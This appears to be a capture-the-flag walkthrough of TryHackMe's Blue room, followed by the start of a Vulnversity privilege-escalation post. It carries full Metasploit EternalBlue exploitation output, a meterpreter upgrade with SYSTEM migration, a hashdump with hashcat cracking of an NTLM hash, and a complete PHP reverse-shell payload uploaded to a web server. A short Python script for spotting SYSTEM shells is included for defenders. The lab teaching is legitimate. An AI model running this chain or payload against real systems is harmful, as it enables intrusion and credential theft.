   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

As can be seen above, four of the results (#2 to #5) are exploit modules; the other two are auxiliary scanner and command modules.

The correct answer for this question was #2:

exploit/windows/smb/ms17_010_eternalblue

3. Show options and set the one required value. What is the name of this value? (All caps for submission). Following on from the above command we can determine the answer.

msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) >

The answer appears to be RHOSTS; however, when entering this into the submission box it was marked incorrect. The answer they were looking for was RHOST. Maybe this was just a glitch in the matrix?

4. Run the exploit.

Before running the exploit we set RHOSTS (the target) and the listener port LPORT. LHOST, the address the shell connects back to, is picked up from the local interface; if the handler does not start on your THM VPN (tun0) address, set it explicitly with set LHOST.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS  THM_VPN_IP
RHOSTS => THM_VPN_IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444

Carrying on our command workflow we attempt to exploit the machine.

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on THM_VPN_IP:4444
[*] THM_VPN_IP:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] THM_VPN_IP:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] THM_VPN_IP:445      - Scanned 1 of 1 hosts (100% complete)
[*] THM_VPN_IP:445 - Connecting to target for exploitation.
[+] THM_VPN_IP:445 - Connection established for exploitation.
[+] THM_VPN_IP:445 - Target OS selected valid for OS indicated by SMB reply
[*] THM_VPN_IP:445 - CORE raw buffer dump (42 bytes)
[*] THM_VPN_IP:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] THM_VPN_IP:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] THM_VPN_IP:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] THM_VPN_IP:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] THM_VPN_IP:445 - Trying exploit with 12 Groom Allocations.
[*] THM_VPN_IP:445 - Sending all but last fragment of exploit packet
[*] THM_VPN_IP:445 - Starting non-paged pool grooming
[+] THM_VPN_IP:445 - Sending SMBv2 buffers
[+] THM_VPN_IP:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] THM_VPN_IP:445 - Sending final SMBv2 buffers.
[*] THM_VPN_IP:445 - Sending last fragment of exploit packet!
[*] THM_VPN_IP:445 - Receiving response from exploit packet
[+] THM_VPN_IP:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] THM_VPN_IP:445 - Sending egg to corrupted connection.
[*] THM_VPN_IP:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (THM_VPN_IP:4444 -> 10.1.0.135:49175) at 2020-04-12 13:50:08 +0100
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>^Z
Background session 1? [y/N]  y

5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

The session opened on a blank line; pressing RETURN brings up the cmd.exe prompt of the exploited machine shown above. Background it with CTRL+Z.

TASK 3 - ESCALATION

1. If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected).

C:\Windows\system32>^Z
Background session 1? [y/N]  y

msf5 > grep meterpreter search shell
   273  payload/android/meterpreter_reverse_http                                            normal     No     Android Meterpreter Shell, Reverse HTTP Inline
   274  payload/android/meterpreter_reverse_https                                           normal     No     Android Meterpreter Shell, Reverse HTTPS Inline
   275  payload/android/meterpreter_reverse_tcp                                             normal     No     Android Meterpreter Shell, Reverse TCP Inline
   439  payload/osx/x64/meterpreter/bind_tcp                                                normal     No     OSX Meterpreter, Bind TCP Stager
   440  payload/osx/x64/meterpreter/reverse_tcp                                             normal     No     OSX Meterpreter, Reverse TCP Stager
   459  payload/python/meterpreter_bind_tcp                                                 normal     No     Python Meterpreter Shell, Bind TCP Inline
   460  payload/python/meterpreter_reverse_http                                             normal     No     Python Meterpreter Shell, Reverse HTTP Inline
   461  payload/python/meterpreter_reverse_https                                            normal     No     Python Meterpreter Shell, Reverse HTTPS Inline
   462  payload/python/meterpreter_reverse_tcp                                              normal     No     Python Meterpreter Shell, Reverse TCP Inline
   482  payload/windows/meterpreter/bind_hidden_ipknock_tcp                                 normal     No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   483  payload/windows/meterpreter/bind_hidden_tcp                                         normal     No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   484  payload/windows/meterpreter_bind_named_pipe                                         normal     No     Windows Meterpreter Shell, Bind Named Pipe Inline
   485  payload/windows/meterpreter_bind_tcp                                                normal     No     Windows Meterpreter Shell, Bind TCP Inline
   486  payload/windows/meterpreter_reverse_http                                            normal     No     Windows Meterpreter Shell, Reverse HTTP Inline
   487  payload/windows/meterpreter_reverse_https                                           normal     No     Windows Meterpreter Shell, Reverse HTTPS Inline
   488  payload/windows/meterpreter_reverse_ipv6_tcp                                        normal     No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
   489  payload/windows/meterpreter_reverse_tcp                                             normal     No     Windows Meterpreter Shell, Reverse TCP Inline
   492  payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                          normal     No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   493  payload/windows/patchupmeterpreter/bind_hidden_tcp                                  normal     No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   524  payload/windows/x64/meterpreter_bind_named_pipe                                     normal     No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   525  payload/windows/x64/meterpreter_bind_tcp                                            normal     No     Windows Meterpreter Shell, Bind TCP Inline (x64)
   526  payload/windows/x64/meterpreter_reverse_http                                        normal     No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   527  payload/windows/x64/meterpreter_reverse_https                                       normal     No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   528  payload/windows/x64/meterpreter_reverse_ipv6_tcp                                    normal     No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   529  payload/windows/x64/meterpreter_reverse_tcp                                         normal     No     Windows Meterpreter Shell, Reverse TCP Inline x64
   566  post/multi/manage/shell_to_meterpreter                                              normal     No     Shell to Meterpreter Upgrade
msf5 >

The module required to upgrade a standard shell to a meterpreter session is post/multi/manage/shell_to_meterpreter

2. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer).

Carrying on our command workflow we select the correct module and list the options.

msf5 > use 566
msf5 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) >

The option this module requires us to set is SESSION.

3. Set the required option, you may need to list all of the sessions to find your target here.

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.10.55.106:49175 (10.10.55.106)

msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1

SESSION => 1

4. Run! If this doesn't work, try completing the exploit from the previous task once more.

msf5 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on THM_VPN_IP:4433
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (180291 bytes) to THM_VPN_IP
[*] Meterpreter session 2 opened (THM_VPN_IP:4433 -> 10.1.0.135:49171) at 2020-04-12 14:52:56 +0100
[*] Stopping exploit/multi/handler

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.27.96)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      THM_VPN_IP:4433 -> 10.1.0.135:49171 (10.10.27.96)

5. Once the meterpreter shell conversion completes, select that session for use.

msf5 post(multi/manage/shell_to_meterpreter) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S <opt>  Row search filter.
    -c <opt>  Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n <opt>  Name or rename a session by ID
    -q        Quiet mode
    -s <opt>  Run a script or module on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

msf5 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.81.119)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      THM_VPN_IP:4433 -> 10.1.0.135:49172 (10.10.81.119)

msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 1120 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

7. List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

C:\Windows\system32>^Z
Background channel 1? [y/N]  y
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 444   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 556   548   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 604   548   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 616   596   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 656   596   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 704   604   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 712   604   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 720   604   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 772   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 828   704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 896   704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 944   704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1012  656   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 1076  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1120  2520  cmd.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
 1156  704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1292  704   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1336  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1388  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 1412  704   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1476  704   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1596  704   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 1612  704   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1724  772   WMIADAP.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WMIADAP.exe
 1936  704   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2044  1292  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2056  772   taskeng.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\taskeng.exe
 2060  828   WmiPrvSE.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 2068  828   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2160  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2392  2384  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2520  2392  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 2600  704   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 2640  556   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2760  704   mscorsvw.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2784  704   mscorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2820  704   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2852  704   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 2892  704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2952  704   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe

meterpreter >

8. Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

meterpreter > migrate 2892
[*] Migrating from 2520 to 2892...
[*] Migration completed successfully.
meterpreter >
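A defender reading the same process list wants a quick way to spot what the migration step relies on. As an added example, not part of this writeup, the script below parses a few rows copied from the meterpreter ps table above, rebuilds the parent/child tree from the PPID column and flags command interpreters running as NT AUTHORITY\SYSTEM in session 0 together with their ancestry; the interpreter watch-list and the function names are my own.

```python
import re
from typing import Dict, List

# Constructed sample: a subset of the rows from the meterpreter 'ps' output above.
PS_SAMPLE = r"""
 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 704   604   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 1120  2520  cmd.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
 1292  704   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 2044  1292  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2392  2384  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2520  2392  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 2892  704   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
"""

# Hypothetical watch-list of command interpreters; extend it to suit your estate.
INTERPRETERS = {"cmd.exe", "powershell.exe"}


def parse_ps(text: str) -> Dict[int, dict]:
    """Parse the fixed-width 'ps' table. Columns are separated by two or more
    spaces, which keeps values like 'NT AUTHORITY\\SYSTEM' intact."""
    procs: Dict[int, dict] = {}
    for line in text.splitlines():
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) < 3 or not fields[0].isdigit():
            continue  # header, separator or blank line
        fields += [""] * (7 - len(fields))  # kernel pseudo-processes have no user/path
        pid, ppid, name, arch, session, user, path = fields[:7]
        procs[int(pid)] = {"pid": int(pid), "ppid": int(ppid), "name": name,
                           "arch": arch, "session": session, "user": user, "path": path}
    return procs


def ancestry(procs: Dict[int, dict], pid: int) -> List[str]:
    """Walk PPID links upward; stop at the root or at a parent missing from the table."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        p = procs[pid]
        chain.append(f"{p['name']}({p['pid']})")
        if p["ppid"] == pid:  # [System Process] is its own parent
            break
        pid = p["ppid"]
    if pid not in procs:
        chain.append(f"?({pid})")  # parent exited or was not listed
    return chain


def suspicious_system_shells(procs: Dict[int, dict]) -> List[dict]:
    """Interpreters running as SYSTEM in session 0. Services rarely need an
    interactive shell, so each hit deserves a look at its ancestors."""
    hits = []
    for p in procs.values():
        if (p["name"].lower() in INTERPRETERS
                and p["user"].upper() == "NT AUTHORITY\\SYSTEM"
                and p["session"] == "0"):
            hits.append({"pid": p["pid"], "chain": " <- ".join(ancestry(procs, p["pid"]))})
    return sorted(hits, key=lambda h: h["pid"])


if __name__ == "__main__":
    for hit in suspicious_system_shells(parse_ps(PS_SAMPLE)):
        print(f"PID {hit['pid']}: {hit['chain']}")
```

The ancestry output makes the chain from the exploit visible at a glance: an x64 PowerShell spawning an x86 PowerShell that spawns cmd.exe, all as SYSTEM, is not something a service normally does.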

TASK 4 - CRACKING

1. Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >

2. Copy this password hash to a file and research how to crack it. What is the cracked password?

We first need to clean up the hash to match the format hashcat expects (hashcat's example-hashes page shows the expected format for each mode). Basically, we keep only the last field of the hashdump line, the NT hash, removing the user name, RID, LM hash and every : separator.

Original - HASH

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Hashcat - HASH

ffb43f0de35be4d9917ac0cc8ad57f8d

To confirm the hash is correct we can use hashid, note we are feeding in the modified hash which is saved in a file (ntlm.txt).

> hashid -m < ntlm.txt
Analyzing 'ffb43f0de35be4d9917ac0cc8ad57f8d'
[+] MD2
[+] MD5 [Hashcat Mode: 0]
[+] MD4 [Hashcat Mode: 900]
[+] Double MD5 [Hashcat Mode: 2600]
[+] LM [Hashcat Mode: 3000]
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5 [Hashcat Mode: 8600]
[+] Skype [Hashcat Mode: 23]
[+] Snefru-128
[+] NTLM [Hashcat Mode: 1000]
[+] Domain Cached Credentials [Hashcat Mode: 1100]
[+] Domain Cached Credentials 2 [Hashcat Mode: 2100]
[+] DNSSEC(NSEC3) [Hashcat Mode: 8300]
[+] RAdmin v2.x [Hashcat Mode: 9900]
> 

The hash is identified as NTLM, and the -m switch of hashid also shows the hashcat mode we need, 1000.

Below is the hashcat command; using backticks we run cat to feed the hash into the hashcat command, and we use rockyou.txt as our wordlist.

--force - ignore warnings, needed here because hashcat is running in a VM
-a 0 - straight (wordlist) attack mode
-o - writes the cracked passwords to a file called cracked.txt.

> hashcat -m 1000 -a 0 `cat ntlm.txt` /usr/share/wordlists/rockyou.txt --force -o cracked.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel Core Processor (Skylake, IBRS), 2048/5918 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
* Device #1: Kernel m01000_a0-pure.ad7daebd.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: ffb43f0de35be4d9917ac0cc8ad57f8d
Time.Started.....: Sun Apr 12 15:34:56 2020 (4 secs)
Time.Estimated...: Sun Apr 12 15:35:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2885.2 kH/s (0.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsouriel

Started: Sun Apr 12 15:34:46 2020
Stopped: Sun Apr 12 15:35:01 2020
> cat cracked.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:PASSWORDHERE
>

TASK 5 - FIND FLAGS!

1. Flag1? (Only submit the flag contents {CONTENTS})

We can use meterpreter to search for the flag files.

meterpreter > search -f flag*
Found 6 results...
    c:\flag1.txt (24 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk (482 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk (848 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk (2344 bytes)
    c:\Users\Jon\Documents\flag3.txt (37 bytes)
    c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter >

We can see above that all three flag files are found; we just need to read them now.

c:\>more flag1.txt
more flag1.txt
flag{FLAG1}

2. Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.

c:\Windows\System32\config>more flag2.txt
more flag2.txt
flag{FLAG2}

3. Flag3?

C:\Users\Jon\Documents>more flag3.txt
more flag3.txt
flag{FLAG3}

TryHackMe - Vulnversity - Privilege Escalation (Task 5)

This post mainly focuses on Task 5 - Privilege Escalation.

To start Task 5, we need to ensure the end of Task 4 was completed correctly; therefore, upload the suggested exploit with a .phtml extension (for example pe.phtml) to the server via the upload page (http://<ip>:3333/internal). Below is the source code of the exploit.

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'IP ON TRYHACKME NETWORK (tun0)';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
